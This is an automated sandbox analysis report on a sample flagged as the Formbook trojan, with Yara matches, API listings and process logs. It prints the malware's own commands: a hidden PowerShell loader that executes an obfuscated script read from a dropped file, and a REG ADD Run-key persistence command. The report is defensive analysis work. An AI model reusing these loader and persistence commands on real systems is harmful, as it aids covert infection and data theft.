Source: Yara match	File source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562C70 NtFreeVirtualMemory,LdrInitializeThunk,	18_2_22562C70
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562DF0 NtQuerySystemInformation,LdrInitializeThunk,	18_2_22562DF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225635C0 NtCreateMutant,LdrInitializeThunk,	18_2_225635C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22564340 NtSetContextThread,	18_2_22564340
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22564650 NtSuspendThread,	18_2_22564650
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562AD0 NtReadFile,	18_2_22562AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562AF0 NtWriteFile,	18_2_22562AF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562AB0 NtWaitForSingleObject,	18_2_22562AB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562B60 NtClose,	18_2_22562B60
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562BF0 NtAllocateVirtualMemory,	18_2_22562BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562BE0 NtQueryValueKey,	18_2_22562BE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562B80 NtQueryInformationFile,	18_2_22562B80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562BA0 NtEnumerateValueKey,	18_2_22562BA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562E30 NtWriteVirtualMemory,	18_2_22562E30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562EE0 NtQueueApcThread,	18_2_22562EE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562E80 NtReadVirtualMemory,	18_2_22562E80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562EA0 NtAdjustPrivilegesToken,	18_2_22562EA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562F60 NtCreateProcessEx,	18_2_22562F60
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562F30 NtCreateSection,	18_2_22562F30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562FE0 NtCreateFile,	18_2_22562FE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562F90 NtProtectVirtualMemory,	18_2_22562F90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562FB0 NtResumeThread,	18_2_22562FB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562FA0 NtQuerySection,	18_2_22562FA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562C60 NtCreateKey,	18_2_22562C60
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562C00 NtQueryInformationProcess,	18_2_22562C00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562CC0 NtQueryVirtualMemory,	18_2_22562CC0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562CF0 NtOpenProcess,	18_2_22562CF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562CA0 NtQueryInformationToken,	18_2_22562CA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562D10 NtMapViewOfSection,	18_2_22562D10
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562D00 NtSetInformationFile,	18_2_22562D00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562D30 NtUnmapViewOfSection,	18_2_22562D30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562DD0 NtDelayExecution,	18_2_22562DD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562DB0 NtEnumerateKey,	18_2_22562DB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22563010 NtOpenDirectoryObject,	18_2_22563010
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22563090 NtSetValueKey,	18_2_22563090
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225639B0 NtGetContextThread,	18_2_225639B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22563D70 NtOpenThread,	18_2_22563D70
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22563D10 NtOpenProcessToken,	18_2_22563D10

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

Code function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403248

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0447F010	2_2_0447F010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0447F8E0	2_2_0447F8E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0447ECC8	2_2_0447ECC8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0274	18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B02C0	18_2_225B02C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EA352	18_2_225EA352
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253E3F0	18_2_2253E3F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F03E6	18_2_225F03E6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B8158	18_2_225B8158
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225CA118	18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22520100	18_2_22520100
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E81CC	18_2_225E81CC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F01AA	18_2_225F01AA
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254C6E0	18_2_2254C6E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22554750	18_2_22554750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252C7C0	18_2_2252C7C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E2446	18_2_225E2446
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225DE4F6	18_2_225DE4F6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530535	18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F0591	18_2_225F0591
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252EA80	18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EAB40	18_2_225EAB40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E6BD7	18_2_225E6BD7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253A840	18_2_2253A840
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22532840	18_2_22532840
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E8F0	18_2_2255E8F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225168B8	18_2_225168B8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22546962	18_2_22546962
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225329A0	18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225FA9A6	18_2_225FA9A6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530E59	18_2_22530E59
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EEE26	18_2_225EEE26
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EEEDB	18_2_225EEEDB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22542E90	18_2_22542E90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225ECE93	18_2_225ECE93
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A4F40	18_2_225A4F40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22550F30	18_2_22550F30
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22572F28	18_2_22572F28
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22522FC8	18_2_22522FC8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253CFE0	18_2_2253CFE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AEFA0	18_2_225AEFA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530C00	18_2_22530C00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22520CF2	18_2_22520CF2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D0CB5	18_2_225D0CB5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253AD00	18_2_2253AD00
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252ADE0	18_2_2252ADE0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22548DBF	18_2_22548DBF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254B2C0	18_2_2254B2C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225D12ED	18_2_225D12ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225352A0	18_2_225352A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251D34C	18_2_2251D34C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E132D	18_2_225E132D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2257739A	18_2_2257739A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225DF0CC	18_2_225DF0CC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225370C0	18_2_225370C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E70E9	18_2_225E70E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EF0E0	18_2_225EF0E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251F172	18_2_2251F172
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225FB16B	18_2_225FB16B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2256516C	18_2_2256516C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253B1B0	18_2_2253B1B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E16CC	18_2_225E16CC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EF7B0	18_2_225EF7B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22521460	18_2_22521460
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EF43F	18_2_225EF43F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E7571	18_2_225E7571
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225CD5B0	18_2_225CD5B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EFA49	18_2_225EFA49
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E7A46	18_2_225E7A46
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A3A6C	18_2_225A3A6C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225DDAC6	18_2_225DDAC6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225CDAAC	18_2_225CDAAC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22575AA0	18_2_22575AA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EFB76	18_2_225EFB76
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A5BF0	18_2_225A5BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2256DBF9	18_2_2256DBF9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259D800	18_2_2259D800
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225338E0	18_2_225338E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22539950	18_2_22539950
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254B950	18_2_2254B950
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22539EB0	18_2_22539EB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EFF09	18_2_225EFF09
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22531F92	18_2_22531F92
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EFFB1	18_2_225EFFB1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225EFCF2	18_2_225EFCF2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E1D5A	18_2_225E1D5A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22533D40	18_2_22533D40

Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: String function: 2259EA12 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: String function: 2251B970 appears 264 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: String function: 22565130 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: String function: 225AF290 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: String function: 22577E54 appears 97 times

Source: SwiftCopy_23052024.exe

Static PE information: invalid certificate

Source: SwiftCopy_23052024.exe, 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenamesemirelief.exeP vs SwiftCopy_23052024.exe

Source: SwiftCopy_23052024.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"

Source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@17/22@2/1

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

0_2_00403248

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

Code function: 0_2_0040450D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040450D

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,

0_2_00402138

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

File created: C:\Users\user\AppData\Roaming\fertiliseringer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_03

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsz14C1.tmp

Jump to behavior

Source: SwiftCopy_23052024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SwiftCopy_23052024.exe	ReversingLabs: Detection: 26%
Source: SwiftCopy_23052024.exe	Virustotal: Detection: 27%

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

File read: C:\Users\user\Desktop\SwiftCopy_23052024.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SwiftCopy_23052024.exe "C:\Users\user\Desktop\SwiftCopy_23052024.exe"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe"
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	Process created: C:\Windows\SysWOW64\Magnify.exe "C:\Windows\SysWOW64\Magnify.exe"
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"	Jump to behavior
